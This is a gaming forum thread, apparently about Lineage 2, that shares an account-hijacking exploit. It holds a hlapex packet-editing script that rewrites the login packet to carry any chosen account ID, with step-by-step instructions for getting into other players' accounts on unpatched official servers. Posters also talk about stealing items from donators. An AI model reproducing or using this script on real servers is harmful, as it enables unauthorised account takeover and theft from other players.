[EXPLOIT!] How to log any account

Guest MaxBastards

if u have idea what is hlapex open the file go on scripts and add this http://www.4shared.com/file/14253700/fbcd31e8/login.html after run hlapex after l2 go ti scripts and load the 'login'add the name of the account u want open and if the server havent fix it yet u will be on this acc ;)

this works only on OFFICIAL server like regenge,the game i dont know if  u can use it...

Guest MaxBastards

i have see on ur server site this:Login Server: Online

Shyla Server: Offline  :P and its a l2 java or official?

but how to know the name of the acc u want to get in?

u need to know or u write with luck Xd

i have see on ur server site this:Login Server: Online

Shyla Server: Offline  :P and its a l2 java or official?

but how to know the name of the acc u want to get in?

u need to know or u write with luck Xd

its official :/

Here it is:

const
account=Here you put the id you wish to login to;
procedure Init;
begin
end;
procedure Free;
begin
end;
begin
if FromServer then exit;
if pck[1]=#$08 then
begin
buf:=#$08;
WriteS('');
WriteD(account);
WriteD(0);
pck:=buf;
end;
end.

You put the script in the scripts folder (open a script, edit it, and save it with a different name)

Open hlapex.exe

Now run l2.exe

When you get to the login screen ~>

Go to scripts tab, press load, select the script you just saved. Press CALL INIT. In hlapex of course...

Now login with one of your accounts (just make a new one, and change your ip before doing it, if you have a main account there :P)

If you login normally till the chars window, it is OK!!!!! YOU OWNED THEM!!!

If not, when you press the selection of the server, you will simply get disconnected or you will crash the server (if they have that old noobish fix :P)

Just have fun.... Oh, i had heard of this a loooong time ago, and many servers (mostly russians) got owned :P It is fixed like 99% (only some servers that their admin doesn't even know what does amped mean have this till working...)

FOR SOME NEWBIES, IT IS FOR OFFICIAL SERVERS, NOT FOR JAVA ONEEEEEEEEEEEEEEEEEEES (C4, if you don't get that way, not C5).

Not man, you dont need to do that.

OPEN HLAPEX!

LOAD CODE!

OPEN L2 AND LOGIN WITH AN ACCOUNT YOU HAVE

THATS ALL! You dont need to click on INIT, only log into the server, hlapex do the work for you.

does anyone know how to get specific acc id? like i target somone ingame and get acc id maybe u guys have a script or something like that???? Cause so i could steal some nice stuff from donators and own them ^^

Im sorry to post it here, Maybe Is off-topic...but usefull for Begginers...

Off-topic: DIGITAL LIFE SERVER IS ON AGAIN !!

here the link for download the system--> http://www.digital.bendras.com/downloads.php?cat_id=1&download_id=1

All come and try your Hlapex here xD

I hope it isn't Fixed Yet :P

End off-topic.

Thnx.